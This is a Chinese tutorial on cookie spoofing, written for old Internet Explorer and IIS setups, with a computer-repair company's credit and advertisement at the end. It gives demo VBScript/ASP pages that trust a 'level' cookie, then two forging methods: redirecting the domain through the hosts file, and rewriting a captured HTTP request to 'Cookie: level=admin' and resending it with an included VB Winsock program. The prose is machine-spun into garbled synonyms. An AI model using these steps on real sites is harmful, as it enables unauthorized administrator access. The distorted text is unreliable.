czy的cookie欺骗教程
czy的cookie欺骗教程
---------孕育发生一个COOKIE文件并转变它
唉,很早就想点关于COOKIE的东东了,重要是网上有不少文章说半天其实也
没有几多实质的工具。
首先各人明白什么是COOKIE,具体点说如果是98那么它们默认寄存在C:\windows\cookies
目次下,如果是2k它们在C:\Documents and Settings\%你的用户名%\Cookies目次下(每个文件都不会超过4KB)
它们的文件名格式为:你的用户名@孕育发生的COOKIE的网页文件所在的WEB目次[COOKIE转变的次数].txt
具体的例子:iwam_system@cookie[3].txt
再来看一看一个最简略的COOKIE文件的内容:
level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*
最后面的两段为服务器孕育发生的COOKIE内容(level和admin)第三段为孕育发生这个COOKIE文件的网站的域名和WEB目次
这儿就要注意了没有记录孕育发生COOKIE文件的文件名!所以在统一个目次下差别文件孕育发生的COOKIE是统一个文件只是每
孕育发生一次COOKIE的文件名的中括号里的数字就要加1,背面的那些就不管它了我也不懂哈:)
再来看看如何天生一个COOKIE我以vbs cript为例:
document.cookie="level" & "=" & "user" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
msgbox document.cookie
这儿我们特别人注意的是末了一段 ";expires=Monday, 01-Jan-03 12:00:00 GMT"这是用来阐明孕育发生的COOKIE文件的
有用时间的,如果没有那么这个COOKIE你将不会在本文扫尾所说的目次里找到它。这个例子中有用时间是2003年固然你
也就能在当地硬盘上找到它们了。
别的当用document.cookie来得到COOKIE内容时设置COOKIE有用时间这一段将被纰漏(固然这也方便了网站的COOKIE
*作)比如说下面将弹出一个内容为 level=user的对话框
好了如今我们来实战一下:
我的网站叫www.locking.8u8.com在它的COOKIE目次里有两个文件一个是admin1.htm内容便是下面的例子
还有一个文件叫level1.htm内容如下:
co=document.cookie
le=mid(co,instr(co,"=")+1,len(co)-instr(co,"=")+1)
if le="user" then
msgbox "you are a user"
else
if le="admin" then
msgbox "you are a administrator"
else
msgbox "you not login"
end if
end if
当你先浏览admin1.htm后再浏览level1.htm时将弹出一个对话框内容为:"you are a user",当你没有浏览过
admin1.htm而直接浏览level1.htm将说 "you not login" (注意有的人大概会先浏览admin1.htm后再直接在硬盘
上变动COOKIE的内容固然如许是不可的)
好了我们的目标便是让我们能在浏览level1时弹个框框说 "you are a administrator" :)
措施只有两个咯:1)把8u8黑了,然后找到谁人level1.htm改了不就可以了不过本篇文章不做讨论哈
2)进行COOKIE欺骗,OK LET GO:)
-----------------------------------(我的体系环境一台2kserver+iis5)
第一步:自已做一个文件名叫admin2.htm吧内容如下
document.cookie="level" & "=" & "admin" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
然后把它放入一个名叫COOKIE的可浏览目次中(COOKIE要位于根目次)
第二步:找到位于C:\WINNT\system32\drivers\etc下的hosts文件在它的背面加上如下一段:
127.0.0.1 www.locking.8u8.com
第三步:仿问www.locking.8u8.com/cookie/admin2.htm(这儿实际是仿问的本机的文件)
第四步:删除hosts中刚才我们添加的内容然后再清掉IE的历史记录
第五步:让我们再次仿问www.locking.8u8.com/cookie/level1.htm
怎样样我们如今是 administrator了吧(注意仿问网站是肯定要在后面加三个w)
在上一节中我所举的例子是一个存活期很长的COOKIE,对付这种
COOKIE他会天生在我们的当土地上的,而对付那些封闭浏览器就生效
的COOKIE我们该怎样来进行欺骗伪造呢?
首先我们应该晓得在我第一节的例子中弹谁人"you are a administrator"
框框的网页(level1.htm)其实是下载在我的当地然后执行的,也便是说
他对COOKIE的检验读取也是在当地,那如果是在远程服务器上呢?比如
一个ASP程序他又是如何读取我们的COOKIE的呢?
先来看看基本的东东吧:当我们利用HTTP协议向远程主机发送一个
GET或是POST请求时,那么如果有这个域名的COOKIE存在(不管是在内存中
还是当土地上的)都将和请求一同发送到服务器去.
下面的便是一个实际的例子:
GET /ring/admin.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
看到末了一行了吧:)
然后我们再来看看服务器是如何进行COOKIE检验的,我举了一个简略的例子:
有两个ASP文件一个叫admin.asp,还有一个叫level.asp
-----------admin.asp------------------
<%response.write now()%>
<%response.write "
"%>
<%response.cookies("level")="user"%>
<%response.write "document.write(document.cookie);"%>
-----------cut here-------------------
-----------level.asp------------------
<%
if Request.Cookies("level")<>"" then
response.write "document.write(document.cookie);"
if request.cookies("level")="user" then
response.write "alert('you are a user');"
else
if request.cookies("level")="admin" then
response.write "alert('you are administrator!');"
set fso1=server.createobject("s cripting.filesystemobject")
set fil=fso1.opentextfile("d:\sms\ring\a.txt",8,true)
fil.writeline "you are admin!"
end if
end if
else
response.write "alert('you are not login');"
end if
%>
-----------cut here-------------------
阐明:当你请求admin.asp时,将孕育发生一个暂时的COOKIE(你封闭浏览器就会生效),然后我们不封闭浏览器而
请求level.asp时它就会用request.cookies来提取你发出的请求内里的cookie,如果你的COOKIE内里的内容是
admin的话那么它将用fso工具在服务器孕育发生一个记录文件(a.txt要注意的是我们在实验时要把目次设为可写)
好了就介绍这么多吧,我们的目的便是让服务器孕育发生a.txt并写入内容"you are admin"还是进行上一节的
域名欺骗吗?不是让我们写一个winsocket程序吧,Let G)
下面是我们VB+WINSCOKET控件写的一个简略的例子的源代码:
-----------------------COOKIE SEND---------------------------------------
Private Sub Command1_Click()
Winsock1.RemotePort = Text3.Text '远程主机打开的端口一般都为80
Winsock1.RemoteHost = Text2.Text '远程主机的域名也可以输IP
Winsock1.Connect '打开一个SOCKET连接
Command1.Enabled = False '一次只能打开一个连接所以要让SEND按钮生效
End Sub
Private Sub winsock1_Connect()
Winsock1.SendData Text1.Text '打开连接乐成的话就发送数据
End Sub
Private Sub Command2_Click()
Winsock1.Close
Command1.Enabled = True '封闭连接,让SEND按钮有用
End Sub
Private Sub winsock1_DataArrival(ByVal bytesTotal As Long) '吸收数据,可以让我们检查数据能否发送乐成
Dim tmpstr As String
Winsock1.GetData tmpstr
Text4.Text = tmpstr
End Sub
-----------------------CUT HERE--------------------------------------------
好,再让我们看一看具体的历程吧:这儿要用到一个不错的程序WinSock Expert v0.3 beta 1
一步:打开一个IE然后再打开winsock expert选择监视刚才打开的IE窗口的数据包
二步: 在IE地点栏输http://61.139.xx.xx/ring/admin.asp,谁人我将看到发出了如下数据
GET /ring/admin.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
不要半闭窗口请http://61.139.xx.xx/ring/level.asp,我们又将看到发出了如下数据
GET /ring/level.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
三步: 好了对第二次发出的数据的末了一行Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
便是我们要改的东东,由于level.asp中相应的COOKIE的检验语句为if request.cookies("level")="admin" then
所以我们只要把下面的数据的末了一行改成Cookie: level=admin; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就可以了,背面的东东很重要下面我再阐明一下:)
四步: 把改过的数据拷到我编的程序的发送框内里输出端口和域名后。。。。。
五步:到服务器看看是不是天生了谁人a.txt内里的内容为"you are admin!
好了不写了,重要还是自已多实验就可以了为了放便各人本文章的程序代码完全公开哈
1.admin.asp和level.asp: http://locking.8u8.com/cookie/admin.txt和level.txt
2.cookieclient.exe及源代码: http://locking.8u8.com/cookie/cookiesend.zip
3.winsock expert: http://software.tom.com/download.asp?id=7500 或是 http://dxqsoft.myrice.com/
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|